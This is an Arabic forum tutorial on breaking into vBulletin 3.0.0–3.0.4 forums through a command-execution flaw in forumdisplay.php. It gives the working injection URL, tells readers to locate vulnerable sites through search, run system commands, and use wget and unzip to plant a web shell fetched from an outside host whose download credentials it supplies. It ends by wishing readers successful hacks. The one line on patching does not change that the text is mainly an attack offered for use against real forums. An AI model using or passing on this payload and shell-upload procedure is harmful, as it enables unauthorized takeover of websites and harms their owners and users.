السلام عليكمسوف اشرح لكم اختراق منتديات الجيل الثالث من 3.0 الى 3.0.4 ورفع الشل واختراق الموقعاولا :اقرا العبارة التاليهاقسم بالله لااخترق اي موقع او منتدى عربي الا موقع او منتدى يسب ديننا الاسلامي....نبدأاولا شيء الثغرة من نوع commands execution يعني تطبيق اوامر اللينكسثانيا الكود المستخدم للثغرة هوكود PHP:forumdisplay.php?f=0&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=id طبعا تلاحظون رقم (((صفر))) تقدر تغيرة للرقم بالنسبة للقسم اللي تدخلة يعني دخلت قسم رقم 8 تحط رقم 8 شيء مهم لازم تغيرةطبعا لازم يكون اقل شيء يتصفح القسم اللي بتغير رقمة متصح واحد الظاهر لحد الان كل شيء مفهوم((( id))) هذا هو الامر لنكس لمعرفة الصلاحياتشروط الثغرةيجب أن تكون زائر .يجب أن تتمكن من رؤية المتواجدون بالأقسام .يجب أن يكون هناك زائر واحد على الأقل في أحد الأقسام .الشرط الأساسي وهو إعطاء قيمة 1 للمصفوفه GLOBALS[] الحين يالله شغل قوقلوبدأهذي هي الاصدارات المصابهvbulletin version 3.0.0vbulletin version 3.0.1vbulletin version 3.0.2vbulletin version 3.0.3vbulletin version 3.0.4نفرض لقيت منتدى مصابة حط كود الثغرة خلف رابط المنتدى مع تغيرررررر رقم للقسم اللي بتدخلة بشرط يكون فيه اقل شيء زائر شاهد الصورة لا حظ حطيت بعد رابط المنتدى شوف الرقم 2 اللي بعد علامة يساوي هذا رقم القسم اللي دخلتبعدين اظغط اوكي اذا طلع لك مثل اللي بالصورة فمعناها المنتدى مصاب وتقدر ترفع شل اوكي الحين طلع لنا اننا مملك صلاحيات حلوووالحين خلنا نغير which wget ضعها مكان كلمة id الاخيرة في الكود شوفوا وش راح يعطينا في الصورة اذا تبي تستعرض الباسوردات برضة pwd مكان id الحين لو بغينا نستعرض الملفات كلها بهذا الكود بس نشيل كلمة id ونحط lsكود PHP:forumdisplay.php?f=1&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=ls مثل ماتشوفون بالصورة طلع المجلداتاختار اي مجلد وارفع علية الشل ونغير الامر id بالامر wget وبعدين نروح نرفع شل على اي مساحة مجانية وناخذ رابط الشل ونحطة بعد كلمةwget وانا رافعت لكم شل على لايكوسhttp://members.lycos.co.uk/alqumacr...up/xxx10xxx.zipطبعا كلمة المرورcriminalnet اليوزرblack الباسوردنكملطبعا بيصير اخر الرابط اللي هو xxx10xxx.zipالحين نفك الظغط عن الوين زيب بالامر unzipيعني يكون كذا cmd=unzip xxx10xxx.zipوبعدين يطلع لك صفحة بيضاء فيها رابط الشلxxx10xxx.phpوبكذا خلاص بقي عليك تطبق اوامر اللينكس واوامر اللينكس متوفرة ومعروفةالترقيع للثغرة رقيه للاصدار السابع افضل شيء اختراقات موفقة